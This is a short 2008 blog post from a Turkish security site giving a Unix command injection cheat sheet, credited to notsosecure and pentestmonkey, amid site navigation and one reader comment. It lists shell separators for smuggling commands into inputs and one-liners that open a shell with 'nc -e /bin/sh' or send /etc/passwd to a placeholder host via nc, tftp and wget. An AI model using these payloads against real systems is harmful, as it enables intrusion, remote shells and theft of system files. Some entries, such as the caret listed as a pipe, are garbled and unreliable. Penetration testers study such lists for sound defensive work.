Unix Command Injection Cheat Sheet

english, unix, comman injection, web application security, guvenlik, exploit, cheat sheet, cat-security, 20.07.2008

Short, yet quite useful command injection cheat sheet.

Executing Commands

Seperating Commands:
blah;blah2
PIPE:
blah | blah2
PIPEZ:
blah ^ blah2
AND:
blah && blah2
OR:
FAIL || X
OR:
blah%0Dblah2%0Dblah3
Backtick:
`blah`
Background:
`blah & blah2`

Getting Files / Data

FTP:
Make a new text, and echo and then redirect to FTP
NC:
nc -e /bin/sh
NC:
echo /etc/passwd | nc host port
TFTP:
echo put /etc/passwd | tftp host
WGET:
wget --post-file /etc/passwd

Credits : notsosecure and pentestmonkey

Yorumunu Ekle -

Yazıcı Versiyonu -

Yorumlar için RSS

İlişkili olabilecek yazılar

Gehinnom - 31.07.2008

Güzel bilgiler tesekkürler. Üzerinde çalistigim kontrol paneli projesinde kullanabilecegim seyler var.

Yorum Yazın

Tüm yorumlar onaydan geçmektedir, bu işlem en uzun 30 dk. sürecektir. E-mail adresleri yeni yorumları bildirme harici hiç bir başka amaçla kullanılmamaktadır ve sitede gözükmemektedir.

ferruh.mavituna

Site genel olarak güvenlik, internet ve web teknolojileri üzerine yazdığım yazılardan oluşmaktadır. Sitede 2003 yılından bu yana yazılmış 1750' den fazla yazı bulunmaktadır.

Bunun yanında projeler de geliştirdiğim projeleri, ar-ge kısmında güvenlik araştırma dokümanlarıma ulaşabilir, programlar kısmından yazdığım yazılımları download edebilirsiniz. Site hakkında.

KATEGORİLER

ARŞİV

Senelere Göre Arşivler

2009 (dur daha yeni başladı!)

2008 (147 yazı)

2007 (358 yazı)

2006 (299 yazı)

2005 (356 yazı)

2004 (350 yazı)

2003 (245 yazı)

Diğer Arşiv Erişimleri

Unix Command Injection Cheat Sheet

Executing Commands

Getting Files / Data

İlişkili olabilecek yazılar

Gehinnom - 31.07.2008

Yorum Yazın

ferruh.mavituna

PROJECTS

ARAMA

TAKİP

YORUMLAR

CANLI YAYIN

KATEGORİLER

ARŞİV

Senelere Göre Arşivler

Diğer Arşiv Erişimleri